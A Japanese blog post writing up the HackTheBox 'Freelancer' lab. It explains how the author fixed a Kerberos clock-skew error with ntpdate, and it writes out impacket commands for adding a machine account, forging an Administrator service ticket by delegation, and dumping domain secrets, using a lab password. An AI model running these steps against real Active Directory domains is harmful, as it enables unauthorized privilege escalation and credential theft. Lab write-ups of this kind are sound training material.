0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

HackTheBox/Freelancer KRB_AP_ERR_SKEW エラー(Clock skew too great)の解決について

Posted at

HackTheBox/Freelancer

複数の攻略記事を見比べて、自分なりに検証もしてみて、やっとroot.txtにたどり着くことが出来ました。

軽く触れてみると
・QR-CODEから得られたURLのID部分。base64でエンコードされています。ここを書き換えてのセッションハイジャック。(個人的にはここが一番萌えた:relaxed:
・SQL Terminalからxp_cmdshellを起動してリバースシェル。
・MemProcFSを使ってのフォレンジック。
・・等々

Difficulty: Hardの内容盛りだくさんのMachineでした。

kerberos

そんな中で、今回記事にしてみたいのはkerberosでのエラーについてです。
素人が一生懸命やったことなので理解が間違っているかもしれませんが、私と同じように時刻同期のエラーでつまづいたという人の目に触れて、一助になれば幸いです。

タイトルにある通りKerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)なんですが
そこまでの過程でlorra199:'PWN3D#l0rr@Armessa199'を取得しています。

そして攻略記事を参考に

impacket-addcomputer -computer-name 'aaaaaaaaaa$' -computer-pass 'bbbbbbb' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'

攻撃用のコンピューターを追加します。名前は'aaaaaaaaaa$'、パスワードは'bbbbbbb'にしています。
001addcomputer.PNG

'aaaaaaaaaa$'に書き込み権限を委任します。
002rbcd.PNG

ここまでは順調です。そして、チケットを取りに行くところでエラー発生!!
003getsterror.PNG

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
調べてみると、クライアントとサーバー間の時刻のズレが大きすぎるために発生するエラーとのこと。

timedatectl status

で確認

sudo timedatectl set-ntp true

で設定を変えてみる
004timedatectl.PNG

それでもダメ:joy:
003getsterror.PNG

次の手段でntpdate -u 10.10.11.5でターゲットと時刻の同期を試みる。が、not permittedとなる。
0051notpermitted.PNG

それならば、rootになって作業ディレクトリも変えて
005root.PNG

systemd-timesyncdとの競合を避けるために

systemctl stop systemd-timesyncd

で自動時刻同期を一時的に停止する。

再度、ntpdate -u 10.10.11.5で同期を試みる。
006ntpdate.PNG

CLOCK: time stepped by 18000.248677(18000秒/60/60=5時間)時刻が調整されました:grin:

ふたたび

impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 'freelancer.htb/aaaaaaaaaa$:bbbbbbb'

実行すると
007getst.PNG
(。´・ω・)ん?なんか成功してるっぽい

カレントディレクトリを調べてみると
008ls.PNG
あったー!!――(゚∀゚)――!!

あとはこれをセオリー通りKRB5CCNAMEに格納して
009export.PNG

impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5

を実行
010secretdumps.PNG

最後に
011winrm.PNG

よっしゃー!で、侵入できました:smirk_cat:

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?